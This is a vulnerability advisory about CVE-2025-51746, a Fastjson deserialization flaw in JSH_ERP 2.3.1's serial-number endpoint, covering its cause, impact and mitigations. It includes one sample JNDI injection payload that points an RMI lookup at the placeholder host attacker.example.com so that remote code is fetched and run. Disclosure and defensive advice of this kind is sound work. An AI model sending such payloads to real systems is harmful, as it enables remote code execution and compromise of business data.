Overview
CVE-2025-51746 identifies a critical security vulnerability in jishenghua JSH_ERP version 2.3.1. The vulnerability resides in the /serialNumber/addSerialNumber endpoint and is susceptible to Fastjson deserialization attacks. This allows attackers to potentially execute arbitrary code on the server, leading to complete system compromise.
Technical Details
The vulnerability stems from the insecure deserialization of user-supplied data using Fastjson. When processing requests to the /serialNumber/addSerialNumber endpoint, the application fails to properly sanitize or validate the incoming serialized data. An attacker can craft a malicious JSON payload containing instructions to execute arbitrary code during the deserialization process. This can be achieved by injecting specific Java classes or utilizing known Fastjson gadgets.
Example of a potential malicious payload (illustrative, adapt to specific environment):
{
"{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://attacker.example.com/Exploit\",\"autoCommit\":true}": "evilcode"
}
This payload attempts to leverage JNDI injection through an RMI service hosted on attacker.example.com to execute malicious code. Note that the specific payload will depend on the Java version and available libraries on the target system. The provided example is simplified and is for illustrative purposes only.
CVSS Analysis
Currently, the CVSS score and severity rating are unavailable. However, given the potential for arbitrary code execution, this vulnerability is likely to be classified as Critical. The impact on confidentiality, integrity, and availability would be high, as a successful exploit could allow an attacker to gain complete control over the system.
Possible Impact
A successful exploitation of this Fastjson deserialization vulnerability could lead to a range of severe consequences, including:
- Remote Code Execution (RCE): Attackers can execute arbitrary code on the server, potentially gaining full control of the system.
- Data Breach: Sensitive data stored within the ERP system could be compromised, including customer information, financial records, and intellectual property.
- System Downtime: The application or entire server could be taken offline due to malicious activity.
- Supply Chain Attacks: Compromised ERP systems can be used as a stepping stone to attack connected systems or organizations, leading to cascading failures and widespread disruption.
- Financial Loss: Costs associated with incident response, data recovery, legal liabilities, and reputational damage.
Mitigation or Patch Steps
To mitigate this vulnerability, the following steps are recommended:
- Upgrade JSH_ERP: Check the official JSH_ERP repository on Gitee for patched versions or updates that address this vulnerability. Apply the update as soon as it becomes available.
- Input Validation: Implement strict input validation and sanitization on the
/serialNumber/addSerialNumberendpoint to prevent the injection of malicious serialized data. - Disable AutoType Feature in Fastjson (if applicable): If possible, disable the
autoTypefeature in Fastjson to prevent arbitrary class instantiation during deserialization. This is often a global configuration setting. - Use a Safe List (if possible): If disabling autoType is not possible, configure Fastjson to only allow deserialization of specific, trusted classes. This significantly reduces the attack surface.
- Web Application Firewall (WAF): Deploy a WAF to detect and block malicious payloads targeting the vulnerable endpoint. Configure rules specifically to prevent Fastjson deserialization attacks.
- Regular Security Audits: Conduct regular security audits and penetration testing to identify and address vulnerabilities proactively.
